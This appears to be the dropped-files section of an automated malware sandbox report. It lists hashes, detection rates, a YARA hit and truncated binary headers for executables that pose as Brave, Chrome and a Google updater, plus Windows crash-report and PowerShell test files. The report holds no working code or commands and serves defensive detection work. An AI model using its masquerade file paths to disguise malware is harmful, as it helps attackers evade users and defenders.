Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Google\brave.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884609
Entropy (8bit):	7.915812566955318
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	EB27BB8CFA99D659E4FE023E9002ECD1
SHA1:	C783400302FDFAE0518269C5A5A8D4BAD29F42A3
SHA-256:	9C01D90543458567C4737731EE6754CC209E4BB78FF648EB75C4D23BE261EF2F
SHA-512:	AB5AD3C094ED1F094AA82D80D298E6D0AB15A94B58B007DBE8A6219FE8498569B5D9013D770BD9910F177F94F2639D84650655E8F60113051E98B386C49C36A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 85%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_6iWK0k820U.exe_1eb949e99f9ba33a6e7a4c5c9eac28fe3ff63a4e_28263dca_17ec24c5\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.635108989383262
Encrypted:	false
SSDEEP:	96:uRCFqPrqKaIeoI7Rj6tpXIQcQvc6QcEDMcw3Dr+HbHg6ZAXGng5FMTPSkvPkpXme:uQgTq8HBUZMXIjE/u7seS274It5
MD5:	3E8E4CE3646B270D9FC2931ABADDECD4
SHA1:	053DECA4CEE6DDB65654FF96551C80AAB844BECF
SHA-256:	5B21D5D72A934E242B7E5D06321840FEF3FA6D299C89B007F1C2AA15A3FD21C1
SHA-512:	6A9EE1DA568DA3CDCCAB944C15D3234498587C6C9755B443D231ADE2C968D514FEE7A4FCE34D966CC05FB0D1F610B21C490E477D9D58A574A7C21F6D26F65665
Malicious:	true
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.3.7.9.4.7.5.6.8.3.7.7.2.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.3.7.9.4.7.5.7.6.8.1.4.9.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.f.b.3.9.c.8.-.1.5.c.1.-.4.0.f.8.-.9.c.5.c.-.c.a.5.8.9.4.b.b.d.6.4.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.4.9.3.e.c.4.-.b.d.b.3.-.4.f.d.4.-.b.f.e.3.-.d.6.0.1.b.9.4.f.3.0.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.i.W.K.0.k.8.2.0.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.a.4.-.0.0.0.1.-.0.0.1.f.-.6.6.b.7.-.d.1.0.3.4.2.0.0.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.d.1.8.6.9.1.c.1.b.a.9.5.b.9.d.0.d.1.0.8.c.7.e.0.9.8.d.8.2.c.e.0.0.0.0.1.a.0.8.!.0.0.0.0.b.f.a.3.7.b.d.2.6.8.6.3.3.c.9.3.d.4.9.7.3.6.e.5.e.9.6.7.c.d.5.6.d.7.d.0.c.8.1.5.!.6.i.W.K.0.k.8.2.0.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Nov 24 20:19:17 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	18580
Entropy (8bit):	2.2300279457604586
Encrypted:	false
SSDEEP:	192:Jim+7hIOfsSGACoOdZj3bQAPu8TyVzyrYPp3h1:gU3B3bQA7y17
MD5:	52A8CDBBAD4EA54FD29100224444F3E8
SHA1:	6AC146A4A92B7E27A59171E7FA94C40C38556524
SHA-256:	D7CDF8DE6651118EBBDA3142A99A0701A40D59A3A4BF607C049C1E203E9E4107
SHA-512:	7DB21B1626B0AF7FF6FBC9B0869CB2884A05703DB8A3733148EBAD8C441E22158F09F7DBFEB8A2A8988941A02CA9D19FC9F12A917FA717D9CF87A3FD02472CDD
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... ..........c............4........... ...<.......D...............T.......8...........T...........H...L?..........\...........H....................................................................U...........B..............GenuineIntelW...........T..............c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER874.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8388
Entropy (8bit):	3.703339965508563
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNijO6O0e6YqXSU2ZSgmfnS+CprR89bi9sfB42m:RrlsNiK6M6Y6SU2MgmfnS4i2fBw
MD5:	E1F9D3D0DF5A68C1597F3704261E0DC0
SHA1:	0D7674BE5924C831825768F3F9A12865421ED536
SHA-256:	030B1DCC5A67DB6D3AFDB6F6885023C89E0BD40DD42D15E9141B70305BBA880F
SHA-512:	A28BF0804E587F00695F7CB3DAE07B19590C96656DF2835109F82B0C7CDF917647A47C613A5D8B21D458B340FD91CE99FEFE50EA6643FB84E2028C3BC6B8EAF8
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.9.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER99E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4716
Entropy (8bit):	4.4934429445840705
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6+JgtWI9ujkWgc8sqYjYZ8fm8M4JYFGMF1+q8v0FGXHfHvId:uITfVRj9grsqYEeJY0kK00XHfHvId
MD5:	A5E5E09864063005757D9AAA62B23B59
SHA1:	E9B3A2A330FA9D9C004B5662F212A87AD70D8C6B
SHA-256:	B2BCB70842AA30BB3CFF8F215D825F80D42C6CB2EF2C018E112DE4A4F8DB4B27
SHA-512:	8940C537D46CCEFD3E93E199F74D32B25A174261EB4AE7B606E6DA3AA2BFDA0A06BAAD6966A7326226885123C647A4A0F84386F2E2743A15E626445B483867C1
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1794569" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Google\brave.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884608
Entropy (8bit):	7.915813410181377
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	9253ED091D81E076A3037E12AF3DC871
SHA1:	EC02829A25B3BF57AD061BBE54180D0C99C76981
SHA-256:	78E0A8309BC850037E12C2D72A5B0843DCD8B412A0A597C2A3DCBD44E9F3C859
SHA-512:	29FF2FD5F150D10B2D281A45DF5B44873192605DE8DC95278D6A7B5053370E4AC64A47100B13C63F3C048DF351A9B51F0B93AF7D922399A91508A50C152E8CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 85%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Users\user\AppData\Local\Google\chrome.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6423552
Entropy (8bit):	7.922005336740627
Encrypted:	false
SSDEEP:	98304:Zr+dbd33oSpsJu9oR+bY11UhoIwBOqF85EiqrvBb2s4U5OoNkI9xFvPrBtOs6ha:x+BzpWu891ZDBOr+iqrpbTLp/U
MD5:	8CD1EA50F8F4C45055400E70DA52B326
SHA1:	40AF98091E8C32CE9C90502B3D851EBC231CACF9
SHA-256:	66552CBE03B205CBA08A2524FB93303DEC5EDF51188758B08D12624DB1EE73E1
SHA-512:	B0BE3ACCCF8CE64343B10E33B7CD5E7292164259D65C07E0C63C08DC05BFA0CF268290B3A37F20F6AFA81D7163BE8C90AC9AE9A7FB93C3E61CBC08310A2BEAF1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...xb..xb..xb.....rb......b.....lb.....Tb.....ib..*...lb.....}b..xb..,b.....{b...i.yb.....yb..Richxb..........................PE..L.....qc.................2....`......o.......P....@..........................Pb.......b...@.................................D.\.<.... ]......................0b.\|.....\.......................\.......\.@............P...............................text...30.......2.................. ..`.rdata....[..P....[..6..............@..@.data.........].......\.............@....rsrc........ ].......\.............@..@.reloc..\|....0b.......a.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\ofg.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	6.270431868500399
Encrypted:	false
SSDEEP:	1536:apyR0Fl1K6g0e8hsEvKAxtE4zo8Sw7Ky7NGHjQR54z5sW0cd/cbPpGA/uYEmsn:a9l1Ed8hsEfLoBw7p7B54p/uPpGA/VEr
MD5:	33DAD992607D0FFD44D2C81FE67F8FB1
SHA1:	E5B67DC05505FB1232504231F41CBA225C282D3C
SHA-256:	95903D8C2D48C4C0667E41878807F646F7648A33ED25D0EB433AAB41C25E31A4
SHA-512:	444973B44292C433A07E5F75F6580EA71799B1F835677BC5B2E42AF6B567A2F70F1B038F019D250A18216701CCF901B300632487EEBCC1113AC803EDB43159E4
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: C:\Users\user\AppData\Local\Google\ofg.exe, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 10%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}f.I9...9...9....u..3....u.......u..-...kr......kr..(...kr..*....u..0...9...X....r..8....r=.8....r..8...Rich9...........................PE..L...oz~c.............................$............@.......................................@..................................L..d...............................L....?..8....................@.......?..@...............T............................text............................... ..`.rdata...d.......f..................@..@.data........`.......<..............@....rsrc................F..............@..@.reloc..L............H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2843
Entropy (8bit):	5.3371553026862095
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKAHKx15:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxM
MD5:	FC7EFC2627DDEB7A6F7202EB28960AF9
SHA1:	B6B7779C7F0FF8AA02BBBA8245824E48B3F2135C
SHA-256:	EED1F2267DBA17354C888AB5DFAB69F38BCDFD9E92523E9555645B3F2FEDEBE9
SHA-512:	4EB113DE3F13FD20C215F8D8BF7C1E55CEE3328B18FDA5C2D94CD01FC7B1EA2909085BB221C7304A1B6BCA26992775603FABD013AFA2750BDAF559FC98F3B6EE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	45177
Entropy (8bit):	5.072498410577891
Encrypted:	false
SSDEEP:	768:PkWNxV3IpNBQkj25h4iUxuaV7frRJv5FVvCxHBG75ard35n9QOdBQNWzktAHkaN2:PkAxV3CNBQkj25h4iUxuaV7flJnVv6HA
MD5:	79EA83B42F934BED47A1B30D85AB0999
SHA1:	D5AD1B90152F5C698A714FC8044C52571EFCD57B
SHA-256:	9DDA715941C069B34C2052F8902BD6FE9C4956DD2F9E8713F8AD72032BD9662B
SHA-512:	6BDD1F73F199EE5A8BC2EB6FF1B13197E1303B2548932F071EA67A657B5D0056605C5FFC3BAEC02AFDF29A5425BCFA003BA607041A462C2A851B59AF0999567C
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.F..._.>....?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........_t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20868
Entropy (8bit):	5.445285768575172
Encrypted:	false
SSDEEP:	384:NtjYUN9JcVSVpSzhDQ+ZU71u16z5mexHVKd3OSHvs++ZYb:3N9JCUUzhDRenUGqzZb
MD5:	29239552A557BF046C9B2B30EADA7201
SHA1:	B647BA11FF0000A0D433DB6FD05B465FC4595133
SHA-256:	F2CDA444400E443938312F1F69F66D11A0C2E0556C0088F4141588AA62152CD4
SHA-512:	C68D746EDC629CC063B7B26ABDDEB3BD813CFA3762BEA5260F22361F1EA53D3CC18B973E463433033D6A9F03CFAE7CB2B15BE5624AA59C18F3CE2A7D0372A7DF
Malicious:	false
Reputation:	unknown
Preview:	@...e...........B...............................................H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..4....................].D.E.....#.......System.Data.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesH................. ....H..m)aUu.........Microsoft.PowerShell.Security...L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F...]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD...............Microsoft.Management.Inf

C:\Users\user\AppData\Local\Temp\85AD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Google\brave.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	335360
Entropy (8bit):	7.548086611496671
Encrypted:	false
SSDEEP:	6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI
MD5:	DA87A0A2ABA605908BF8B9A3F4377481
SHA1:	5CAC4EA0B3F0CC2D7C04655DB12AD0443CBAA5CF
SHA-256:	22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4
SHA-512:	55A8A27A013CB2C3DEDA81779D89AB956A5F57D00A155496ABC7BF3C5A87F3B7C41058AB3681CBBD0406F69EA01C4FFC3E5779C2CA676088A68CB87F19C34C28
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$..........;..eh..eh..eh.fi..eh.`iS.eh..`i..eh..ai..eh..fi..eh.ai..eh.di..eh..dhE.eh^.li..eh^..h..eh...h..eh^.gi..ehRich..eh........PE..d......b.........."..........n......D..........@.............................`............`..................................................e..P...............(............P..d....Q..p............................P..@...............x............................text...0........................... ..`.rdata.............................@..@.data...X....p.......`..............@....pdata..(............l..............@..@_RDATA..\............\|..............@..@.rsrc................~..............@..@.reloc..d....P......................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dy0bss3s.cxu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emjnhz12.fsd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fx2elh1u.5ol.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjxht2fs.nxk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pahyln4b.wgi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rufhejub.gw1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfbcxguy.byu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbiyed3u.5mv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y014ety0.swp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxlvyq3l.cou.psm1

Download File
